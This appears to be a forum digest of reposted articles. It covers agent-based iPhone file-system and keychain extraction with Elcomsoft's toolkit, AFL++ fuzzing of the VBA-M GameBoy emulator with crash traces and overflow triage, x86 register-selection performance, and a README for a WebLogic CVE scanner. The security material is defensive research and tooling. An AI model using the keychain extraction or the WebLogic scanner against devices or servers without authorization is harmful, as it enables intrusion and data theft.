iPhone Acquisition Without a Jailbreak (iOS 11 and 12) February 20th, 2020 by Oleg Afonin Category: «Elcomsoft News» 22 10 32 Shares Elcomsoft iOS Forensic Toolkit can perform full file system acquisition and decrypt the keychain from non-jailbroken iPhone and iPad devices. The caveat: the device must be running iOS 11 or 12 (except iOS 12.3, 12.3.1 and 12.4.1), and you must use an Apple ID registered in Apple’s Developer Program. In this article, I’ll explain the pros and contras of the new extraction method compared to traditional acquisition based on the jailbreak. Why jailbreak? Before I start talking about the new extraction method that does not require a jailbreak, let me cover the jailbreak first. In many cases, jailbreaking the device is the only way to obtain the file system and decrypt the keychain from iOS devices. Jailbreaking the device provides the required low-level access to the files and security keys inside the device, which is what we need to perform the extraction. Jailbreaks have their negative points; lots of them in fact. Jailbreaking may be dangerous if not done properly. Jailbreaking the device can modify the file system (especially if you don’t pay close attention during the installation). A jailbreak installs lots of unnecessary stuff, which will be difficult to remove once you are done with extraction. Finally, jailbreaks are obtained from third-party sources; obtaining a jailbreak from the wrong source may expose the device to malware. For these and other reasons, jailbreaking may not be an option for some experts. This is exactly what the new acquisition method is designed to overcome. Agent-based extraction The new extraction method is based on direct access to the file system, and does not require jailbreaking the device. Using agent-based extraction, you can can perform the full file system extraction and decrypt the keychain without the risks and footprint associated with third-party jailbreaks. Agent-based extraction is new. In previous versions, iOS Forensic Toolkit offered the choice of advanced logical extraction (all devices) and full file system extraction with keychain decryption (jailbroken devices only). The second acquisition method required installing a jailbreak. EIFT 5.30 introduced the third extraction method based on direct access to the file system. The new acquisition method utilizes an extraction agent we developed in-house. Once installed, the agent will talk to your computer, delivering significantly better speed and reliability compared to jailbreak-based extraction. In addition, agent-based extraction is completely safe as it neither modifies the system partition nor remounts the file system while performing automatic on-the-fly hashing of information being extracted. Agent-based extraction does not make any changes to user data, offering forensically sound extraction. Both the file system image and all keychain records are extracted and decrypted. Once you are done, you can remove the agent with a single command. Compatibility of agent-based extraction Jailbreak-free extraction is only available for a limited range of iOS devices. Supported devices range from the iPhone 5s all the way up to the iPhone Xr, Xs and Xs Max if they run any version of iOS from iOS 11 through iOS 12.4 (except iOS 12.3 and 12.3.1). Apple iPad devices running on the corresponding SoC are also supported. Here’s where agent-based extraction stands compared to other acquisition methods: The differences between the four acquisition methods are as follows. Logical acquisition: works on all devices and versions of iOS and. Extracts backups, a few logs, can decrypt keychain items (not all of them). Extracts media files and app shared data. Extraction with a jailbreak: full file system extraction and keychain decryption. Only possible if a jailbreak is available for a given combination of iOS version and hardware. Extraction with checkra1n/checkm8: full file system extraction and keychain decryption. Utilizes a hardware exploit. Works on iOS 12.3-13.3.1. Compatibility is limited to A7..A11 devices (up to and including the iPhone X). Limited BFU extraction available if passcode unknown. Agent-based extraction: full file system extraction and keychain decryption. Does not require jailbreaking. Only possible for a limited range of iOS versions (iOS 11-12 except 12.3.1, 12.3.2, 12.4.1). Prerequisites Before you begin, you must have an Apple ID enrolled in Apple’s Developer Program in order to install the agent onto the iOS device being acquired. The Apple ID connected to that account must have two-factor authentication enabled. In addition, you will need to set up an Application-specific password in your Apple account, and use that app-specific password instead of the regular Apple ID password during the Agent installation. Important: you can use your Developer Account for up to 100 devices of every type (e.g. 100 iPhones and 100 iPads). You can remove previously enrolled devices to make room for additional devices. Using agent-based extraction Once you have your Apple ID enrolled in Apple’s Developer Program, and have an app-specific password created, you can start with the agent. Connect the iOS device being acquired to your computer. Approve pairing request (you may have to enter the passcode on the device to do that). Launch Elcomsoft iOS Forensic Toolkit 5.30 or newer. The main menu will appear. We strongly recommend performing logical acquisition first (by creating the backup, extracting media files etc.) For agent-based extraction, you’ll be using numeric commands. Install the agent by using the ‘1’ (Install agent) command. You will have to enter your credentials (Apple ID and the app-specific password you’ve generated). Then type the ‘Team ID’ related to your developer account. Note that a non-developer Apple ID account is not sufficient to install the Agent. After the installation, start the Agent on the device and go back to the desktop to continue. Acquisition steps are similar to jailbreak-based acquisition, except that there is no need to use the ‘D’ (Disable lock) command. Leave the Agent (the iOS app) working in the foreground. Obtain the keychain by entering the ‘2’ command. A copy of the keychain will be saved. Extract the file system with the ‘3’ command. A file system image in the TAR format will be created. After you have finished the extraction, use the ‘4’ command to remove the agent from the device. To analyse the file system image, use Elcomsoft Phone Viewer or an alternative forensic tool that supports .tar images. For analysing the keychain, use Elcomsoft Phone Breaker. For manual analysis, mount or unpack the image (we recommend using a UNIX or macOS system). Conclusion If you have unprocessed Apple devices with iOS 11 – 12.2 or 12.4, and if you cannot jailbreak for one or another reason, give the new extraction mode a try. iOS Forensic Toolkit 5.30 can pull the file system and decrypt the keychain, leaves no apparent traces, does not remount and does not modify the file system while offering safe, fast and reliable extraction. Sursa: https://blog.elcomsoft.com/2020/02/iphone-acquisition-without-a-jailbreak-ios-11-and-12/

Fuzzing A GameBoy Emulator With AFL++ fuzzing reversing exploiting Recently I’ve started a little fuzzing project. After doing some research, I’ve decided to fuzz a gaming emulator. The target of choice is a GameBoy and GameBoy Advance emulator called VisualBoyAdvance-M, which is also called VBA-M. At the time of writing the emulator was still being maintained. VBA-M seems to be a fork of VisualBoyAdvance, for which development seems to have stopped in 2006. Disclaimer: I’m publishing this blog post to share some fuzzing methodology and tooling and not to blame the developers. I’ve previously reported all my fuzzing discoveries to the developer team of VBA-M on GitHub. The attack surface of emulators is quite large because of their complex functionality and various ways to pass user input to the application. There’s parsing functionality for the game ROMs and the save states, built-in cheating support and then there’s all that video and audio I/O related stuff. I’ve decided to fuzz the GameBoy ROM files. The general approach is as follows: Let the emulator load a ROM Let it parse the file and do initialization Run the game for a few frames. This catches bugs that only occur after some time, like corrupting internal memory of the emulator while playing a game. Building A Fuzzing Harness Of course the emulator spins up a GUI every time it’s launched. Since this is quite slow and is not required for the fuzzer at all, this has to be skipped. The same applies for any other functionality that’s not required for the fuzzing harness to work. There are two front ends that use the emulation library provided by VBA-M: One is based on SDL and one on WxWidgets. My fuzzing harness is a modified version of the SDL front end, since it’s more minimal compared to the other one. The SDL sub directory can be found here and contains all files related for this front end. Here’s an overview of the changes I’ve applied to transform the SDL front end to a fuzzing harness: I’ve added a counter that’s being decremented after the emulator has performed one full cycle in gbEmulate(). The emulator shuts down with exit(0) as soon as this value hits the zero value. This is required for the fuzzer since I want it to stop in case no memory corruption happens within a certain amount of frames. Initialization routines for key maps, user preferences and GameBoy Advance ROMs were removed. The routines for sound and video were kept intact because bugs may be present in those too. This makes the fuzzer slower but increases coverage. However, the actual output was patched out. This means that for example the internal video states are still being calculated up to a certain point but nothing is actually being shown on the GUI. For example, functions that perform screen output were simply replaced with return statements. And that’s basically it. LLVM Mode And Persistent Mode One additional change was made to the main() function of the emulator. I’ve added the __AFL_LOOP(10000) directive. This tells AFL to perform in-process fuzzing for a given amount of times before spinning up a new target process. This means that one VBA-M invocation happens for every 10000 inputs, which ultimately speeds up fuzzing. Of course, you have to make sure to not introduce any side effects when using this feature. This mode is also called AFL persistent mode and you can read more about it here. Compiling the fuzzing harness in LLVM Mode and with AFL++ provides much better performance than using something like plain GCC and provides more features, including the persistent mode mentioned above. After compiling AFL++ with LLVM9 or newer, the magic afl-clang-fast++ and afl-clang-fast compilers are available. If your distribution doesn’t provide these packages yet, AFL++ has you covered once again with a Dockerfile. I’ve then used these compilers to build VBA-M with full ASAN enabled: $ cmake .. -DCMAKE_CXX_COMPILER=afl-clang-fast++ -DCMAKE_CC_COMPILER=afl-clang-fast $ AFL_USE_ASAN=1 make -j32 Now it’s time to create some input files for the fuzzer. Building Input Files I’ve created multiple minimal GameBoy ROMs using GBStudio and minimized them afterwards. This worked by deleting some parts using a hex editor and checking if the ROM still works afterwards. Minimizing input files can make the fuzzing process more efficient. System Configuration I’ve used a 32 core machine from Hetzner Cloud as fuzzing server. Before starting to fuzz, you have to make sure that the system is configured properly or you won’t have the best performance possible. The afl-system-config script does this automatically for you. Just be sure to reset the affected values after fuzzing has finished, since this also disables ASLR. Or just throw the fuzzing server away. By putting the AFL working directory on a RAM disk, you can potentially gain some additional speed and avoid wearing out the disks at the same time. I’ve created my RAM disk as follows: $ mkdir /mnt/ramdisk $ mount -t tmpfs -o size=100G tmpfs /mnt/ramdisk Running The Fuzzer I want to start one AFL instance per core. To make this as convenient as possible, I’ve used an AFL start script from here and modified it to make it fit my needs: #!/usr/bin/env python3 # Original from: https://gamozolabs.github.io/fuzzing/2018/09/16/scaling_afl.html import subprocess, threading, time, shutil, os import random, string import multiprocessing NUM_CPUS = multiprocessing.cpu_count() RAMDISK = "/mnt/ramdisk" INPUT_DIR = RAMDISK + "/afl_in" OUTPUT_DIR = RAMDISK + "/afl_out" BACKUP_DIR = "/opt/afl_backup" BIN_PATH = "/opt/vbam/visualboyadvance-m/build/vbam" SCHEDULES = ["coe", "fast", "explore"] print("Using %s CPU Cores" % (NUM_CPUS)) def do_work(cpu): if cpu == 0: fuzzer_arg = "-M" schedule = "exploit" else: fuzzer_arg = "-S" schedule = random.choice(SCHEDULES) os.mkdir("%s/tmp%d" % (OUTPUT_DIR, cpu)) # Restart if it dies, which happens on startup a bit while True: try: args = [ "taskset", "-c", "%d" % cpu, "afl-fuzz", "-f", "%s/tmp%d/a.gb.gz" % (OUTPUT_DIR, cpu), "-p", schedule, "-m", "none", "-i", INPUT_DIR, "-o", OUTPUT_DIR, fuzzer_arg, "fuzzer%d" % cpu, "--", BIN_PATH, "%s/tmp%d/a.gb.gz" % (OUTPUT_DIR, cpu) ] sp = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE) sp.wait() except Exception as e: print(str(e)) pass print("CPU %d afl-fuzz instance died" % cpu) # Some backoff if we fail to run time.sleep(1.0) assert os.path.exists(INPUT_DIR), "Invalid input directory" if not os.path.exists(BACKUP_DIR): os.mkdir(BACKUP_DIR) if os.path.exists(OUTPUT_DIR): print("Backing up old output directory") shutil.move( OUTPUT_DIR, BACKUP_DIR + os.sep + ''.join(random.choice(string.ascii_uppercase) for _ in range(16))) print("Creating output directory") os.mkdir(OUTPUT_DIR) # Disable AFL affinity as we do it better os.environ["AFL_NO_AFFINITY"] = "1" for cpu in range(0, NUM_CPUS): threading.Timer(0.0, do_work, args=[cpu]).start() # Let fuzzer stabilize first if cpu == 0: time.sleep(5.0) while threading.active_count() > 1: time.sleep(5.0) try: subprocess.check_call(["afl-whatsup", "-s", OUTPUT_DIR]) except: pass This spawns one master AFL instance and several slaves with each one assigned to an own CPU core. Also, every slave gets its own randomized power schedule. The only thing that’s left is to start this script on the server in a tmux session to detach it from the current SSH session. Here’s what the results look like after running it for a while: Summary stats ============= Fuzzers alive : 32 Total run time : 33 days, 4 hours Total execs : 59 million Cumulative speed : 1200 execs/sec Pending paths : 392 faves, 159374 total Pending per fuzzer : 12 faves, 4980 total (on average) Crashes found : 3662 locally unique The total fuzzing speed could be higher but I went for maximum coverage, so I could catch more potential bugs. Time consuming operations like audio and video I/O certainly slow things down. Fuzzing Results Some of my results can only be reproduced using an ASAN build of VBA-M since heap memory corruption doesn’t necessarily crash the target. Fuzzing was performed on commit 951e8e0ebeeab4fc130e05bfb2c143a394a97657. I’ve found 11 unique crashes in total. Here are the interesting ones: Overflow of Global Variable in mapperTAMA5RAM() ==22758==ERROR: AddressSanitizer: global-buffer-overflow on address 0x55780a09da1c at pc 0x557809b0a468 bp 0x7ffd30d551e0 sp 0x7ffd30d551d8 WRITE of size 4 at 0x55780a09da1c thread T0 #0 0x557809b0a467 in mapperTAMA5RAM(unsigned short, unsigned char) /path/to/vbam/visualboyadvance-m/src/gb/gbMemory.cpp:1247:73 #1 0x557809abd7be in gbWriteMemory(unsigned short, unsigned char) /path/to/vbam/visualboyadvance-m/src/gb/GB.cpp:991:13 #2 0x557809aeaac0 in gbEmulate(int) /path/to/vbam/visualboyadvance-m/src/gb/gbCodes.h #3 0x557809695d4d in main /path/to/vbam/visualboyadvance-m/src/sdl/SDL.cpp:1858:17 #4 0x7f2498e41152 in __libc_start_main (/usr/lib/libc.so.6+0x27152) #5 0x5578095ad6ad in _start (/path/to/vbam/ge/build/vbam+0xb66ad) Address 0x55780a09da1c is a wild pointer. SUMMARY: AddressSanitizer: global-buffer-overflow /path/to/vbam/visualboyadvance-m/src/gb/gbMemory.cpp:1247:73 in mapperTAMA5RAM(unsigned short, unsigned char) This is a case where the indexing of a global variable goes wrong. Check out this code snippet that seems to cover special cases for Tamagotchi on the GameBoy platform: void mapperTAMA5RAM(uint16_t address, uint8_t value) { if ((address & 0xffff) <= 0xa001) { switch (address & 1) { case 0: // 'Values' Register { value &= 0xf; gbDataTAMA5.mapperCommands[gbDataTAMA5.mapperCommandNumber] = value; [...] } [...] } [...] } [...] } The fuzzer found various inputs file that cause the value of gbDataTAMA5.mapperCommandNumber to become larger than the gbDataTAMA5.mapperCommands array, which is static and always holds 16 entries. This results in a write operation of 4 bytes that goes beyond the gbDataTAMA5 structure. In fact, it was possible to write to other structures nearby. There’s a limitation that restricts the overflow from going beyond the offset 0xFF since VBA-M reads only a single byte into the index. This happens even though the data type of the index itself is an integer. Since I had over 850 unique cases that trigger this bug, I’ve checked how much each one overflows the array using a GDB batch script called dump.gdb: break *mapperTAMA5RAM+153 r i r rax The value of RAX at the breakpoint is the offset of the write operation. I’ve launched GDB like this: for f in *; do cp "$f" /tmp/yolo.gb.gz && gdb --batch --command=dump.gdb --args /path/to/vbam/visualboyadvance-m/build/vbam /tmp/yolo.gb.gz | tail -1; done This executes the emulator until the buggy write operation happens, prints the offset and exits. During a debugging session it can also be observed which data structure is getting manipulated by the write operation: p &gbDataTAMA5.mapperCommands[gbDataTAMA5.mapperCommandNumber] $2 = (int *) 0x5555557ed6dc <gbSgbSaveStructV3+124> <-- of out bounds This clearly isn’t pointing to anything inside gbDataTAMA5 and therefore demonstrates that memory can be corrupted using this bug. However, I haven’t found a way to gain code execution using this Writing to a function pointer using a partial overwrite or something similar would be a way to exploit this. The only things that I was able to manipulate were sound settings and a structure that defines how many days there are in a given month Too bad. Overflow of Global Variable in mapperHuC3RAM() ==21687==ERROR: AddressSanitizer: global-buffer-overflow on address 0x561152cdf760 at pc 0x56115274a793 bp 0x7ffedd4cab10 sp 0x7ffedd4cab08 WRITE of size 4 at 0x561152cdf760 thread T0 #0 0x56115274a792 in mapperHuC3RAM(unsigned short, unsigned char) /path/to/vbam/visualboyadvance-m/src/gb/gbMemory.cpp:1090:57 #1 0x5611526ff7be in gbWriteMemory(unsigned short, unsigned char) /path/to/vbam/visualboyadvance-m/src/gb/GB.cpp:991:13 #2 0x56115272a547 in gbEmulate(int) /path/to/vbam/visualboyadvance-m/src/gb/gbCodes.h:1246:1 #3 0x5611522d7d4d in main /path/to/vbam/visualboyadvance-m/src/sdl/SDL.cpp:1858:17 #4 0x7f39eb078152 in __libc_start_main (/usr/lib/libc.so.6+0x27152) #5 0x5611521ef6ad in _start (/path/to/vbam/triage/build/vbam+0xb66ad) 0x561152cdf760 is located 32 bytes to the left of global variable 'gbDataTAMA5' defined in '/path/to/vbam/visualboyadvance-m/src/gb/gbMemory.cpp:1138:13' (0x561152cdf780) of size 168 0x561152cdf760 is located 4 bytes to the right of global variable 'gbDataHuC3' defined in '/path/to/vbam/visualboyadvance-m/src/gb/gbMemory.cpp:991:12' (0x561152cdf720) of size 60 SUMMARY: AddressSanitizer: global-buffer-overflow /path/to/vbam/visualboyadvance-m/src/gb/gbMemory.cpp:1090:57 in mapperHuC3RAM(unsigned short, unsigned char) The function mapperHuC3RAM() gets called by gbWriteMemory(). The corruption happens after these lines: p = &gbDataHuC3.mapperRegister2; *(p + gbDataHuC3.mapperRegister1++) = value & 0x0f; The value of p points to invalid memory next to the gbDataHuC3 variable in the fuzzing case. Therefore the write operation happens outside of it and can potentially be used to overwrite other content on the stack. However, it wasn’t possible to properly control the write operation and therefore no critical locations could be overwritten. User-After-Free in gbCopyMemory() ==13939==ERROR: AddressSanitizer: heap-use-after-free on address 0x615000003680 at pc 0x55b3dc38388b bp 0x7ffcecd0e1e0 sp 0x7ffcecd0e1d8 READ of size 1 at 0x615000003680 thread T0 #0 0x55b3dc38388a in gbCopyMemory(unsigned short, unsigned short, int) /path/to/vbam/visualboyadvance-m/src/gb/GB.cpp:882:44 #1 0x55b3dc38388a in gbWriteMemory(unsigned short, unsigned char) /path/to/vbam/visualboyadvance-m/src/gb/GB.cpp:1428:9 #2 0x55b3dc3a931c in gbEmulate(int) /path/to/vbam/visualboyadvance-m/src/gb/gbCodes.h #3 0x55b3dbf55d4d in main /path/to/vbam/visualboyadvance-m/src/sdl/SDL.cpp:1858:17 #4 0x7f5f9d50e152 in __libc_start_main (/usr/lib/libc.so.6+0x27152) #5 0x55b3dbe6d6ad in _start (/path/to/vbam/triage/build/vbam+0xb66ad) 0x615000003680 is located 384 bytes inside of 488-byte region [0x615000003500,0x6150000036e8) freed by thread T0 here: #0 0x55b3dbf0e8a9 in free (/path/to/vbam/triage/build/vbam+0x1578a9) #1 0x7f5f9d55bd03 in fclose@@GLIBC_2.2.5 (/usr/lib/libc.so.6+0x74d03) previously allocated by thread T0 here: #0 0x55b3dbf0ebd9 in malloc (/path/to/vbam/triage/build/vbam+0x157bd9) #1 0x7f5f9d55c5ee in __fopen_internal (/usr/lib/libc.so.6+0x755ee) #2 0x672f303030312f71 (<unknown module>) This bugs seems to be triggered upon doing HDMA (Horizontal Blanking Direct Memory Access) using this helper function: void gbCopyMemory(uint16_t d, uint16_t s, int count) { while (count) { gbMemoryMap[d >> 12][d & 0x0fff] = gbMemoryMap[s >> 12][s & 0x0fff]; s++; d++; count--; } } The fuzzer found a case where the source of the DMA write operation points to memory which has been freed previously. In case the allocation of this address can be controlled, the write operation could therefore also be controlled partially. Maybe. Maybe not Null Dereference in gbReadMemory() ==16217==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x5629cb1be6ae bp 0x000000000000 sp 0x7ffe9ccb8c40 T0) ==16217==The signal is caused by a READ memory access. ==16217==Hint: address points to the zero page. #0 0x5629cb1be6ad in gbReadMemory(unsigned short) /path/to/vbam/visualboyadvance-m/src/gb/GB.cpp:1801:20 #1 0x5629cb1d59dd in gbEmulate(int) /path/to/vbam/visualboyadvance-m/src/gb/GB.cpp:4637:42 #2 0x5629cad8fd4d in main /path/to/vbam/visualboyadvance-m/src/sdl/SDL.cpp:1858:17 #3 0x7fa13d83d152 in __libc_start_main (/usr/lib/libc.so.6+0x27152) #4 0x5629caca76ad in _start (/path/to/vbam/ge/build/vbam+0xb66ad) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /path/to/vbam/visualboyadvance-m/src/gb/GB.cpp:1801:20 in gbReadMemory(unsigned short) ==16217==ABORTING The bug happens in these lines: if (mapperReadRAM) return mapperReadRAM(address); return gbMemoryMap[address >> 12][address & 0x0fff]; <-- null deref happens here The gbMemoryMap entry at index 10 is being accessed, which is NULL. This is only a DoS though and I’ve also found two more NULL dereference bugs like this in other locations. DoS Caused By Invalid Calculated Size AFL also found another case where it was possible to cause a DoS on the emulator. This is caused by an invalid and very large size parameter that’s being passed to a malloc() call. Here’s why that happens: The size of the ROM is being read from the ROM header, which can be controlled by an attacker This value is the size parameter for a malloc() call. If the attacker places a negative value in the respective header field, the emulator will just use this value without any prior checks and pass it to malloc(). Since malloc() only accepts signed values of type size_t, the negative value will be converted to an unsigned value and will therefore by very huge. malloc() tries to allocate several gigabytes of memory, which causes the process to hang. The fix would be to use an unsigned value for the size value. Also, an additional sanitation should be added after reading the value, since GameBoy games rarely use more than a few gigabytes of memory Static Analysis: Overflow of Global filename Variable Before fuzzing I’ve also performed some static analysis of the SDL front end. I’ve found that by simply calling vbam with a very long GameBoy ROM file path, a global variable called filename can be corrupted. It’s defined in SDL.cpp as char filename[2048]. On startup, the following code is being executed: utilStripDoubleExtension(szFile, filename); The szFile variable contains the input string which was passed to the emulator and filename is the global variable mentioned before. This is the implementation of utilStripDoubleExtension(): // strip .gz or .z off end void utilStripDoubleExtension(const char *file, char *buffer) { if (buffer != file) // allows conversion in place strcpy(buffer, file); [...] } This is a quite standard buffer overflow vulnerability that overwrites the global variable filename. Overwriting it doesn’t trigger any canary checks since it’s not a local variable. Because of the overflow it’s possible to overwrite the global variables that were defined before filename. A way to exploit this would be to overwrite a function pointer or something similar. In fact, there are function pointers available to be overwritten just before filename: struct EmulatedSystem emulator = { NULL, NULL, NULL, NULL, NULL, NULL, <- These are all function pointers NULL, NULL, NULL, NULL, NULL, NULL, false, 0 }; [...] uint32_t systemColorMap32[0x10000]; uint16_t systemColorMap16[0x10000]; uint16_t systemGbPalette[24]; char filename[2048]; [...] Notice the size of systemColorMap32 and systemColorMap16: These are huge arrays which prevent filename from overflowing into the emulator struct since there’s a limit which restricts the size of the arguments passed to applications via the command line. Exploiting this would have been a funny CTF challenge but oh well OK BYE! Sursa: https://bananamafia.dev/post/gb-fuzz/

Does register selection matter to performance on x86 CPUs? fiigii.com 2020-02-16 Compiler, Intel, x86 Instruction selection is a critical portion in compilers, as different instructions could cause significant performance differences even though the semantics not changed. Does register selection also matter to performance (assume the register selection does not lead to less or more register spills)? Honestly, I never intentionally thought of this question until I came across it on Zhihu (a Chinese Q&A website). But this is a really interesting topic that reflects many tricks of assembly programming and compiler code generation. So, that deserves a blog to refresh my memory and give a share In other words, the question is equivalent to Is one of the instructions below faster than another one? And the question can be extended to any instruction of x86/x86-64 ISAs (not only on ADD). From undergraduate classes in CS departments, we know modern computer architectures usually have a pipeline stage called register renaming that assigns real physical registers to the named logic register referred to in an assembly instruction. For example, the following code uses EAX twice but the two usages are not related to each other. 1 2 ADD EDX, EAX ADD EAX, EBX Assume this code is semantically correct. In practice, CPUs usually assign different physical registers to the two EAX for breaking anti-dependency. So they can parallel execute on pipelined superscalar CPUs, and ADD EAX, EBX does not have to worry about if writing over EAX impacts ADD EDX, EAX. Therefore, we usually suppose different register names in assembly code do NOT cause performance difference on modern x86 CPUs. Is the story over? No. The above statements only hold for general cases. There are a lot of corner cases existing in the real world that our college courses never reached. CPUs are pearls of modern engineering and industry, which also have many corner cases breaking our common sense. So, different register names will impact performance a lot, sometimes. I collected these corner cases in four categories. Note, the rest of the article only talks about Intel micro-architectures. Special Instructions A few instructions are executing slower with certain logic registers due to micro-architecture limitations. The most famous one is LEA. LEA was designed to leverage the complex and powerful x86 addressing-mode in wider areas, such as arithmetic computations. LEA could be executed on AGU (Address Generation Unit) and save registers from intermediate results. However, certain forms of LEA only can be executed on port1, which those LEA forms with lower ILP and higher latency are called slow LEA. According to the Intel optimization manual, using EBP, RBP, or R13 as the base address will make LEA slower. Although compilers could assign other registers to the base address variables, sometimes that is impossible in register allocations and there are more forms of slow LEAs that cannot be improved by register selection. Hence, in general, compilers avoid generating slow LEAs by (1) replacing LEA by equivalent instruction sequences that may need more temporary registers or (2) folding LEA into its user instructions’ addressing modes. Partial Register Stall Most kinds of x86 registers (e.g., general-purpose registers, FLAGS, and SIMD registers, etc.) can be accessed by multiple granularities. For instance, RAX can be partially accessed via EAX, AX, AH, and AL. Accessing AL is independent of AH on Intel CPUs, but reading EAX content that written though AL has significant performance degradation (5-6 cycles of latency). Consequently, Intel suggests always using registers with sizes of 32- or 64-bit. 1 2 3 4 5 6 MOV AL, BYTE PTR [RDI] MOV EBX, EAX // partial register stall MOVZX EBX, BYTE PTR [RDI] AND EAX, 0xFFFFFF00 OR EBX, EAX // no partial register stall Partial register stall is relatively easy to detect on general-purpose registers, but similar problems could happen on FLAGS registers and that is pretty covert. Certain instructions like CMP update all bits of FLAGS as the execution results, but INC and DEC write into FLAGS except CF. So, if JCC directly use FLAGS content from INC/DEC, JCC would possibly have false dependency from unexpected instructions. 1 2 3 4 CMP EDX, DWORD PTR [EBP] ... INC ECX JBE LBB_XXX // JBE reads CF and ZF, so there would be a false dependency from CMP Consequently, on certain Intel architectures, compilers usually do not generate INC/DEC for loop count updating (i.e., i++ of for (int i = N; i != 0; i--)) or reuse the INC/DEC produced FLAGS on JCC. On the flip side, that would increase the code size and make I-cache issues. Fortunately, Intel has fixed the partial register stall on FLAGS since SandyBridge. But that still exists on most of the mainstream ATOM CPUs. So far, you may already think of SIMD registers. Yes, the partial register stall also occurs on SIMD registers. But partial SIMD/FLAGS register stall is an instruction selection issue instead of register selection. Let’s finish this section and move on. Architecture Bugs Certain Intel architectures (SandyBridge, Haswell, and Skylake) have a bug on three instructions - LZCNT, TZCNT, and POPCNT. These three instructions all have 2 operands (1 source register and 1 destination register), but they are different from most of the other 2-operand instructions like ADD. ADD reads its source and destination, and stores the result back to the destination register, which ADD-like instructions are called RMW (Read-Modify-Write). LZCNT, TZCNT, and POPCNT are not RWM that just read the source and write back to the destination. Due to some unknown reason, those Intel architectures incorrectly treat LZCNT, TZCNT, and POPCNT as the normal RWM instructions, which the LZCNT, TZCNT, and POPCNT have to wait for the computing results in both operands. Actually, only waiting for the source register getting done is enough. 1 2 3 POPCNT RCX, QWORD PTR [RDI] ... POPCNT RCX, QWORD PTR [RDI+8] Assume the above code is compiled from an unrolled loop that iteratively computes bit-count on an array. Since each POPCNT operates over a non-overlapped Int64 element, so the two POPCNT should execute totally in parallel. In other words, unrolling the loop by 2 iterations can make it at least 2x faster. However, that does not happen because Intel CPUs think that the second POPCNT needs to read RCX that written by the first POPCNT. So, the two POPCNT never gets parallel running. To solve this problem, we can change the POPCNT to use a dependency-free register as the destination, but that usually complicates the compiler’s register allocation too much. A simpler solution is to force triggering register renaming on the destination register via zeroing it. 1 2 3 4 5 XOR RCX, RCX // Force CPU to assign a new physical register to RCX POPCNT RCX, QWORD PTR [RDI] ... XOR RCX, RCX // Force CPU to assign a new physical register to RCX POPCNT RCX, QWORD PTR [RDI+8] Zeroing RCX by XOR RCX, RXC or SUB RCX, RCX does not actually execute XOR or SUB operations that instructions just trigger register renaming to assign an empty register to RCX. Therefore, XOR REG1, REG1 and SUB REG1, REG1 do not reach the CPU pipeline stages behind register renaming, which makes the zeroing very cheap even though that increases CPU front-end pressures a bit. SIMD Registers Intel fulfills really awesome SIMD acceleration via SSE/AVX/AVX-512 ISA families. But there are more tricks on SIMD code generation than the scalar side. Most of the issues are not only about instruction/register selections but also impacted by instruction encoding, calling conventions, and hardware optimizations, etc. Intel introduced VEX encoding with AVX that allows instructions to have an additional register to make the destination non-destructive. That is really good for register allocation on new SIMD instructions. However, Intel made a VEX counterpart for every old SSE instruction even though non-SIMD floating-point instructions. Then something gets messed up. 1 2 3 MOVAPS XMM0, XMMWORD PTR [RDI] ... VSQRTSS XMM0, XMM0, XMM1 // VSQRTSS XMM0, XMM1, XMM1 could be much faster SQRTSS XMM0, XMM1 computes the square root of the floating point number in XMM1 and writes the result into XMM0. The VEX version VSQRTSS requires 3 register operands, which copies the upper 64-bit of the second operand to the result. That makes VSQRTSS has additional dependencies on the second operand. For example, in the above code, VSQRTSS XMM0, XMM0, XMM1 has to wait for loading data into XMM0 but that is useless for scalar floating-point code. You may think that we can let compilers always reuse the 3rd register at the 2nd position, VSQRTSS XMM0, XMM1, XMM1, to break the dependency. However, that does not work when the 3rd operand directly from a memory location, like VSQRTSS XMM0, XMM1, XMMWORD PTR [RDI]. In that situation, a better solution would insert XOR to trigger the register renaming for dst. Usually, programmers think that using 256-bit YMM registers should get 2x faster than 128-bit XMM registers. Actually, that is not always true. Windows x64 calling conventions define XMM0-XMM15 as callee saved registers, so using YMM0-YMM15 would cause more caller saving code than XMM registers. Moreover, Intel only implemented store forwarding for registers <= 128-bit, so that spilling YMM register could be more expensive than XMM. These additional overheads could reduce the benefits of using YMM. One More Thing Look back at the very beginning code of this post, that seems not to fall into the above categories. But the 2 lines of code still may run in different performances. In the code section below, the comments show the instruction encoding, which means the binary representation of instructions in memory. We can see using ADD with EAX as dst register is 1-byte short than another, so that has higher code density and better cache-friendly. 1 2 ADD EAX, 0xffff0704 // 05 04 07 FF FF ADD EBX, 0xffff0704 // 81 C3 04 07 FF FF Consequently, even though selecting EAX or other registers (like EBX, ECX, R8D, etc.) does not directly change ADD‘s latency/throughput, it is also possible to impact the whole program performance. Sursa: https://fiigii.com/2020/02/16/Does-register-selection-matter-to-performance-on-x86-CPUs/

weblogicScaner 截至 2020 年1月15日，weblogic 漏洞扫描工具。若存在未记录且已公开 POC 的漏洞，欢迎提交 issue。 原作者已经收集得比较完整了，在这里做了部分的 bug 修复，部分脚本 POC 未生效，配置错误等问题。之前在做一次内网渗透，扫了一圈，发现 CVE-2017-10271 与 CVE-2019-2890，当时就郁闷了，怎么跨度这么大，中间的漏洞一个都没有，什么运维人员修一半，漏一半的，查了一下发现部分 POC 无法使用。在这个项目里面对脚本做了一些修改，提高准确率。 目前可检测漏洞编号有（部分非原理检测，需手动验证）： weblogic administrator console CVE-2014-4210 CVE-2016-0638 CVE-2016-3510 CVE-2017-3248 CVE-2017-3506 CVE-2017-10271 CVE-2018-2628 CVE-2018-2893 CVE-2018-2894 CVE-2018-3191 CVE-2018-3245 CVE-2018-3252 CVE-2019-2618 CVE-2019-2725 CVE-2019-2729 CVE-2019-2890 快速开始 依赖 python >= 3.6 进入项目目录，使用以下命令安装依赖库 $ pip3 install requests 使用说明 usage: ws.py [-h] -t TARGETS [TARGETS ...] -v VULNERABILITY [VULNERABILITY ...] [-o OUTPUT] optional arguments: -h, --help 帮助信息 -t TARGETS [TARGETS ...], --targets TARGETS [TARGETS ...] 直接填入目标或文件列表（默认使用端口7001）. 例子： 127.0.0.1:7001 -v VULNERABILITY [VULNERABILITY ...], --vulnerability VULNERABILITY [VULNERABILITY ...] 漏洞名称或CVE编号，例子："weblogic administrator console" -o OUTPUT, --output OUTPUT 输出 json 结果的路径。默认不输出结果 Sursa: https://github.com/0xn0ne/weblogicScanner

